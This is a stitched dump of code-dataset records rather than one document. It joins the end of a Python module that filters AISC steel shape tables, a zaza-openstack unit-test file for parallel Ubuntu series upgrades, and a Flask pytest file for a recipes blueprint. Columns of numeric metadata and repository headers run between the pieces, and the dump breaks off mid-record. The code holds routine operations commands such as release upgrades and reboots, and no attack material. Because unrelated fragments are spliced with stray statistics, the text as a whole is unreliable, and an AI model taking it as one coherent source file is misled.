    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'MT':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def S(self, filter=None, filter2=None):
    """Select all 'S' (American Standard Beam) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'S':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def WT(self, filter=None, filter2=None):
    """Select all 'WT' (tee cut from a W-shape) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'WT':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def LL(self, filter=None, filter2=None):
    """Select all '2L' (double angle) shapes.

    Note the method is named ``LL`` because '2L' is not a valid Python
    identifier; the rows are matched on the literal type string '2L'.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != '2L':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
# Module-level convenience handles: build the shared AISC 15th-edition
# database once at import time and alias its main tables.
db = aisc_15th_database()
defs = db.definitions  # property definitions table -- assumed per-label definition text; confirm against the class
sections = db.shapes  # raw shape-property rows (one list per section)
labels = db.labels  # column labels aligned with each row of `sections`
| 39.533879
| 126
| 0.502792
| 3,415
| 33,841
| 4.835139
| 0.064422
| 0.029978
| 0.081759
| 0.059048
| 0.888748
| 0.880148
| 0.880148
| 0.880148
| 0.880148
| 0.880148
| 0
| 0.043573
| 0.389646
| 33,841
| 856
| 127
| 39.533879
| 0.755846
| 0.049378
| 0
| 0.895801
| 0
| 0
| 0.005974
| 0.003322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024883
| false
| 0.07154
| 0
| 0
| 0.049767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0231dbf51a39d74c1028cd861a36f4ebd1c238e8
| 23,907
|
py
|
Python
|
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
unit_tests/utilities/test_zaza_utilities_parallel_series_upgrade.py
|
fnordahl/zaza-openstack-tests
|
bf4f41213592448a105eb37dc9fa523a89c309a1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import mock
import sys
import unittest
import unit_tests.utils as ut_utils
import zaza.openstack.utilities.generic as generic_utils
import zaza.openstack.utilities.series_upgrade as series_upgrade
import zaza.openstack.utilities.parallel_series_upgrade as upgrade_utils
# Canned `juju status` application entry used as the default payload in the
# tests below: three units of 'app', each carrying an 'app-hacluster'
# subordinate; unit app/0 (and its subordinate) is the leader.
FAKE_STATUS = {
'can-upgrade-to': '',
'charm': 'local:trusty/app-136',
'subordinate-to': [],
'units': {'app/0': {'leader': True,
'machine': '0',
'subordinates': {
'app-hacluster/0': {
'charm': 'local:trusty/hacluster-0',
'leader': True}}},
'app/1': {'machine': '1',
'subordinates': {
'app-hacluster/1': {
'charm': 'local:trusty/hacluster-0'}}},
'app/2': {'machine': '2',
'subordinates': {
'app-hacluster/2': {
'charm': 'local:trusty/hacluster-0'}}}}}
# Variant status for a mongodb application with three units and no
# subordinates; mongo/0 is the leader.
FAKE_STATUS_MONGO = {
'can-upgrade-to': '',
'charm': 'local:trusty/mongodb-10',
'subordinate-to': [],
'units': {'mongo/0': {'leader': True,
'machine': '0',
'subordinates': {}},
'mongo/1': {'machine': '1',
'subordinates': {}},
'mongo/2': {'machine': '2',
'subordinates': {}}}}
class Test_ParallelSeriesUpgradeSync(ut_utils.BaseTestCase):
    """Synchronous tests for the parallel_series_upgrade helper functions."""

    def setUp(self):
        # No shared mocking needed for these synchronous tests; each test
        # calls the pure helpers in upgrade_utils directly.
        super(Test_ParallelSeriesUpgradeSync, self).setUp()

    def test_get_leader_and_non_leaders(self):
        leaders = {
            'app/0': {
                'leader': True,
                'machine': '0',
                'subordinates': {
                    'app-hacluster/0': {
                        'charm': 'local:trusty/hacluster-0',
                        'leader': True}}}}
        non_leaders = {
            'app/1': {
                'machine': '1',
                'subordinates': {
                    'app-hacluster/1': {
                        'charm': 'local:trusty/hacluster-0'}}},
            'app/2': {
                'machine': '2',
                'subordinates': {
                    'app-hacluster/2': {
                        'charm': 'local:trusty/hacluster-0'}}}}
        self.assertEqual(
            (leaders, non_leaders),
            upgrade_utils.get_leader_and_non_leaders(FAKE_STATUS))

    def _check_app_config(self, charm, **overrides):
        """Assert app_config(charm) equals the standard config + overrides."""
        expected = {
            'origin': 'openstack-origin',
            'pause_non_leader_subordinate': True,
            'pause_non_leader_primary': True,
            'post_upgrade_functions': [],
            'pre_upgrade_functions': [],
            'post_application_upgrade_functions': [],
            'follower_first': False,
        }
        expected.update(overrides)
        self.assertEqual(expected, upgrade_utils.app_config(charm))

    def test_app_config_openstack_charm(self):
        self._check_app_config('keystone')

    def test_app_config_mongo(self):
        self._check_app_config('mongodb', origin=None, follower_first=True)

    def test_app_config_ceph(self):
        self._check_app_config(
            'ceph-mon',
            origin='source',
            pause_non_leader_subordinate=False,
            pause_non_leader_primary=False)

    def test_app_config_percona(self):
        self._check_app_config(
            'percona-cluster',
            origin='source',
            post_application_upgrade_functions=[
                ('zaza.openstack.charm_tests.mysql.utils.'
                 'complete_cluster_series_upgrade')])
class AioTestCase(ut_utils.BaseTestCase):
    """Test-case base class whose ``test_*`` methods may be coroutines.

    Attribute access is intercepted so that any coroutine ``test_*``
    method is returned wrapped in a synchronous driver that runs it to
    completion on the event loop.  Wrappers are memoised per attribute
    name so repeated lookups hand back the same callable.
    """

    def __init__(self, methodName='runTest', loop=None):
        # Use the caller-supplied loop when given, otherwise the default.
        self.loop = loop or asyncio.get_event_loop()
        self._function_cache = {}
        super(AioTestCase, self).__init__(methodName=methodName)

    def coroutine_function_decorator(self, func):
        """Return a blocking wrapper that drives coroutine *func*."""
        def run_sync(*args, **kwargs):
            return self.loop.run_until_complete(func(*args, **kwargs))
        return run_sync

    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        # Only test methods that are coroutine functions get wrapped.
        if item.startswith('test_') and asyncio.iscoroutinefunction(value):
            cache = self._function_cache
            if item not in cache:
                cache[item] = self.coroutine_function_decorator(value)
            return cache[item]
        return value
class TestParallelSeriesUpgrade(AioTestCase):
def setUp(self):
super(TestParallelSeriesUpgrade, self).setUp()
if sys.version_info < (3, 6, 0):
raise unittest.SkipTest("Can't AsyncMock in py35")
self.patch_object(series_upgrade, "async_prepare_series_upgrade")
self.patch_object(generic_utils, 'check_call')
# Juju Status Object and data
self.juju_status = mock.AsyncMock()
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS
self.patch_object(upgrade_utils, "model")
self.model.async_get_status = self.juju_status
self.async_run_action = mock.AsyncMock()
self.model.async_run_action = self.async_run_action
self.async_block_until = mock.AsyncMock()
self.model.async_block_until = self.async_block_until
self.model.async_wait_for_unit_idle = mock.AsyncMock()
self.async_run_on_machine = mock.AsyncMock()
self.model.async_run_on_machine = self.async_run_on_machine
self.model.async_block_until_units_on_machine_are_idle = \
mock.AsyncMock()
@mock.patch.object(upgrade_utils.cl_utils, 'get_class')
async def test_run_post_application_upgrade_functions(
self,
mock_get_class
):
called = mock.AsyncMock()
mock_get_class.return_value = called
await upgrade_utils.run_post_application_upgrade_functions(
['my.thing'])
mock_get_class.assert_called_once_with('my.thing')
called.assert_called()
@mock.patch.object(upgrade_utils.cl_utils, 'get_class')
async def test_run_pre_upgrade_functions(self, mock_get_class):
called = mock.AsyncMock()
mock_get_class.return_value = called
await upgrade_utils.run_pre_upgrade_functions('1', ['my.thing'])
mock_get_class.assert_called_once_with('my.thing')
called.assert_called_once_with('1')
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_parallel_series_upgrade_mongo(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS_MONGO
upgrade_config = upgrade_utils.app_config('mongodb')
await upgrade_utils.parallel_series_upgrade(
'mongodb',
from_series='trusty',
to_series='xenial',
**upgrade_config
)
mock_async_set_series.assert_called_once_with(
'mongodb', to_series='xenial')
self.juju_status.assert_called()
# The below is using `any_order=True` because the ordering is
# undetermined and differs between python versions
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
], any_order=True)
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'2',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'0',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
])
mock_post_application_upgrade_functions.assert_called_once_with([])
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_serial_series_upgrade_mongo(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
self.juju_status.return_value.applications.__getitem__.return_value = \
FAKE_STATUS_MONGO
upgrade_config = upgrade_utils.app_config('mongodb')
await upgrade_utils.serial_series_upgrade(
'mongodb',
from_series='trusty',
to_series='xenial',
**upgrade_config
)
mock_async_set_series.assert_called_once_with(
'mongodb', to_series='xenial')
self.juju_status.assert_called()
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
])
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'2',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
mock.call(
'0',
origin=None,
application='mongodb',
files=None,
workaround_script=None,
post_upgrade_functions=[]),
])
mock_post_application_upgrade_functions.assert_called_once_with([])
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_parallel_series_upgrade(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
await upgrade_utils.parallel_series_upgrade(
'app',
from_series='trusty',
to_series='xenial',
)
mock_async_set_series.assert_called_once_with(
'app', to_series='xenial')
self.juju_status.assert_called()
# The below is using `any_order=True` because the ordering is
# undetermined and differs between python versions
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
mock.call('0', to_series='xenial'),
], any_order=True)
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'1',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'2',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'0',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
])
mock_post_application_upgrade_functions.assert_called_once_with(None)
@mock.patch.object(upgrade_utils, 'run_post_application_upgrade_functions')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_prepare_series_upgrade')
@mock.patch.object(upgrade_utils.series_upgrade_utils, 'async_set_series')
@mock.patch.object(upgrade_utils, 'maybe_pause_things')
@mock.patch.object(upgrade_utils, 'series_upgrade_machine')
async def test_serial_series_upgrade(
self,
mock_series_upgrade_machine,
mock_maybe_pause_things,
mock_async_set_series,
mock_async_prepare_series_upgrade,
mock_post_application_upgrade_functions,
):
await upgrade_utils.serial_series_upgrade(
'app',
from_series='trusty',
to_series='xenial',
)
mock_async_set_series.assert_called_once_with(
'app', to_series='xenial')
self.juju_status.assert_called()
mock_async_prepare_series_upgrade.assert_has_calls([
mock.call('0', to_series='xenial'),
mock.call('1', to_series='xenial'),
mock.call('2', to_series='xenial'),
])
mock_maybe_pause_things.assert_called()
mock_series_upgrade_machine.assert_has_calls([
mock.call(
'0',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'1',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
mock.call(
'2',
origin='openstack-origin',
application='app',
files=None,
workaround_script=None,
post_upgrade_functions=None),
])
mock_post_application_upgrade_functions.assert_called_once_with(None)
@mock.patch.object(upgrade_utils, 'add_confdef_file')
@mock.patch.object(upgrade_utils, 'remove_confdef_file')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_complete_series_upgrade')
@mock.patch.object(upgrade_utils, 'reboot')
@mock.patch.object(upgrade_utils, 'async_do_release_upgrade')
@mock.patch.object(upgrade_utils, 'async_dist_upgrade')
async def test_series_upgrade_machine(
self,
mock_async_dist_upgrade,
mock_async_do_release_upgrade,
mock_reboot,
mock_async_complete_series_upgrade,
mock_remove_confdef_file,
mock_add_confdef_file
):
await upgrade_utils.series_upgrade_machine(
'1',
post_upgrade_functions=None,
pre_upgrade_functions=None,
files=None,
workaround_script=None)
mock_async_dist_upgrade.assert_called_once_with('1')
mock_async_do_release_upgrade.assert_called_once_with('1')
mock_reboot.assert_called_once_with('1')
mock_async_complete_series_upgrade.assert_called_once_with('1')
mock_remove_confdef_file.assert_called_once_with('1')
mock_add_confdef_file.assert_called_once_with('1')
@mock.patch.object(upgrade_utils, 'add_confdef_file')
@mock.patch.object(upgrade_utils, 'remove_confdef_file')
@mock.patch.object(upgrade_utils.os_utils, 'async_set_origin')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_complete_series_upgrade')
@mock.patch.object(upgrade_utils, 'reboot')
@mock.patch.object(upgrade_utils, 'async_do_release_upgrade')
@mock.patch.object(upgrade_utils, 'async_dist_upgrade')
async def test_series_upgrade_machine_with_source(
self,
mock_async_dist_upgrade,
mock_async_do_release_upgrade,
mock_reboot,
mock_async_complete_series_upgrade,
mock_async_set_origin,
mock_remove_confdef_file,
mock_add_confdef_file
):
await upgrade_utils.series_upgrade_machine(
'1',
origin='openstack-origin',
application='app',
post_upgrade_functions=None,
pre_upgrade_functions=None,
files=None,
workaround_script=None)
mock_async_dist_upgrade.assert_called_once_with('1')
mock_async_do_release_upgrade.assert_called_once_with('1')
mock_reboot.assert_called_once_with('1')
mock_async_complete_series_upgrade.assert_called_once_with('1')
mock_async_set_origin.assert_called_once_with(
'app', 'openstack-origin')
mock_remove_confdef_file.assert_called_once_with('1')
mock_add_confdef_file.assert_called_once_with('1')
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_primary(self, mock_gather):
    """Pausing only non-leader primaries runs "pause" on each primary unit."""
    async def _sequential_gather(*coros):
        # Await coroutines one at a time rather than concurrently so the
        # call order recorded on the action mock stays deterministic.
        for coro in coros:
            await coro
    mock_gather.side_effect = _sequential_gather
    await upgrade_utils.maybe_pause_things(
        FAKE_STATUS,
        ['app/1', 'app/2'],
        pause_non_leader_subordinate=False,
        pause_non_leader_primary=True)
    expected_calls = [
        mock.call(unit, "pause", action_params={})
        for unit in ('app/1', 'app/2')]
    self.async_run_action.assert_has_calls(expected_calls)
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_subordinates(self, mock_gather):
    """Pausing only subordinates runs "pause" on each hacluster unit."""
    async def _sequential_gather(*coros):
        # Serialize the awaited coroutines for deterministic call order.
        for coro in coros:
            await coro
    mock_gather.side_effect = _sequential_gather
    await upgrade_utils.maybe_pause_things(
        FAKE_STATUS,
        ['app/1', 'app/2'],
        pause_non_leader_subordinate=True,
        pause_non_leader_primary=False)
    expected_calls = [
        mock.call(unit, "pause", action_params={})
        for unit in ('app-hacluster/1', 'app-hacluster/2')]
    self.async_run_action.assert_has_calls(expected_calls)
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_all(self, mock_gather):
    """With both flags set, each subordinate is paused before its primary."""
    async def _sequential_gather(*coros):
        # Serialize the awaited coroutines for deterministic call order.
        for coro in coros:
            await coro
    mock_gather.side_effect = _sequential_gather
    await upgrade_utils.maybe_pause_things(
        FAKE_STATUS,
        ['app/1', 'app/2'],
        pause_non_leader_subordinate=True,
        pause_non_leader_primary=True)
    expected_calls = [
        mock.call(unit, "pause", action_params={})
        for unit in ('app-hacluster/1', 'app/1',
                     'app-hacluster/2', 'app/2')]
    self.async_run_action.assert_has_calls(expected_calls)
async def test_maybe_pause_things_none(self):
    """With both pause flags off, no pause action may be issued at all."""
    await upgrade_utils.maybe_pause_things(
        FAKE_STATUS,
        ['app/1', 'app/2'],
        pause_non_leader_subordinate=False,
        pause_non_leader_primary=False)
    self.async_run_action.assert_not_called()
async def test_add_confdef_file(self):
    """add_confdef_file should tee dpkg force-conf options into apt.conf.d."""
    await upgrade_utils.add_confdef_file('1')
    expected_cmd = (
        """echo """
        """'DPkg::options { "--force-confdef"; "--force-confnew"; }' | """
        """sudo tee /etc/apt/apt.conf.d/local"""
    )
    self.async_run_on_machine.assert_called_once_with('1', expected_cmd)
async def test_remove_confdef_file(self):
    """remove_confdef_file should delete the local apt conf file via sudo."""
    await upgrade_utils.remove_confdef_file('1')
    expected_cmd = 'sudo rm /etc/apt/apt.conf.d/local'
    self.async_run_on_machine.assert_called_once_with('1', expected_cmd)
async def test_async_do_release_upgrade(self):
    """async_do_release_upgrade runs a fully non-interactive release upgrade
    with a generous (120 minute) timeout."""
    await upgrade_utils.async_do_release_upgrade('1')
    expected_cmd = (
        'yes | sudo DEBIAN_FRONTEND=noninteractive '
        'do-release-upgrade -f DistUpgradeViewNonInteractive')
    self.async_run_on_machine.assert_called_once_with(
        '1', expected_cmd, timeout='120m'
    )
async def test_prepare_series_upgrade(self):
    """prepare_series_upgrade delegates straight through to the juju helper."""
    await upgrade_utils.prepare_series_upgrade('1', to_series='xenial')
    self.async_prepare_series_upgrade.assert_called_once_with(
        '1', to_series='xenial')
async def test_reboot(self):
    """reboot should background 'init 6' and immediately exit the session."""
    await upgrade_utils.reboot('1')
    expected_cmd = 'sudo init 6 & exit'
    self.async_run_on_machine.assert_called_once_with('1', expected_cmd)
async def test_async_dist_upgrade(self):
    """async_dist_upgrade should refresh the package index and then run a
    non-interactive dist-upgrade keeping old conffiles."""
    await upgrade_utils.async_dist_upgrade('1')
    dist_upgrade_cmd = (
        """yes | sudo DEBIAN_FRONTEND=noninteractive """
        """apt-get --assume-yes """
        """-o "Dpkg::Options::=--force-confdef" """
        """-o "Dpkg::Options::=--force-confold" dist-upgrade""")
    expected_calls = [
        mock.call('1', 'sudo apt-get update'),
        mock.call('1', dist_upgrade_cmd),
    ]
    self.async_run_on_machine.assert_has_calls(expected_calls)
| 39.256158
| 79
| 0.610742
| 2,603
| 23,907
| 5.220899
| 0.095659
| 0.064459
| 0.049007
| 0.06262
| 0.803091
| 0.766593
| 0.732009
| 0.723915
| 0.70677
| 0.700736
| 0
| 0.0071
| 0.287154
| 23,907
| 608
| 80
| 39.320724
| 0.790342
| 0.042916
| 0
| 0.72119
| 0
| 0
| 0.135508
| 0.058625
| 0
| 0
| 0
| 0
| 0.104089
| 1
| 0.020446
| false
| 0
| 0.01487
| 0.001859
| 0.048327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
026ab65d70a704acad659ec9d7adeee9facfc7bb
| 2,247
|
py
|
Python
|
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
"""
This file (test_recipes.py) contains the functional tests for the `recipes` blueprint.
These tests use GETs and POSTs to different URLs to check for the proper behavior
of the `recipes` blueprint.
"""
from project import create_app
def test_home_page():
    """
    GIVEN a Flask application configured for testing
    WHEN the '/' page is requested (GET)
    THEN check that the response is valid
    """
    flask_app = create_app('flask_test.cfg')
    # Drive the app through Flask's built-in test client.
    with flask_app.test_client() as test_client:
        response = test_client.get('/')
        assert response.status_code == 200
        for fragment in (b"Welcome to the",
                         b"Flask User Management Example!",
                         b"Need an account?",
                         b"Existing user?"):
            assert fragment in response.data
def test_home_page_post():
    """
    GIVEN a Flask application configured for testing
    WHEN the '/' page is posted to (POST)
    THEN check that a '405' (Method Not Allowed) status code is returned
    """
    flask_app = create_app('flask_test.cfg')
    # Drive the app through Flask's built-in test client.
    with flask_app.test_client() as test_client:
        response = test_client.post('/')
        assert response.status_code == 405
        assert b"Flask User Management Example!" not in response.data
def test_home_page_with_fixture(test_client):
    """
    GIVEN a Flask application configured for testing (test_client fixture)
    WHEN the '/' page is requested (GET)
    THEN check that the response is valid
    """
    response = test_client.get('/')
    assert response.status_code == 200
    for fragment in (b"Welcome to the",
                     b"Flask User Management Example!",
                     b"Need an account?",
                     b"Existing user?"):
        assert fragment in response.data
def test_home_page_post_with_fixture(test_client):
    """
    GIVEN a Flask application configured for testing (test_client fixture)
    WHEN the '/' page is posted to (POST)
    THEN check that a '405' (Method Not Allowed) status code is returned
    """
    response = test_client.post('/')
    assert response.status_code == 405
    assert b"Flask User Management Example!" not in response.data
| 34.045455
| 86
| 0.700935
| 323
| 2,247
| 4.758514
| 0.219814
| 0.078074
| 0.091087
| 0.113208
| 0.871178
| 0.871178
| 0.871178
| 0.861418
| 0.861418
| 0.861418
| 0
| 0.010286
| 0.221184
| 2,247
| 65
| 87
| 34.569231
| 0.868
| 0.385403
| 0
| 0.814815
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0.518519
| 1
| 0.148148
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a0932402b85c9b687b639e6e65ebef35b906f84
| 84,677
|
py
|
Python
|
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | null | null | null |
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | 107
|
2019-04-12T13:21:08.000Z
|
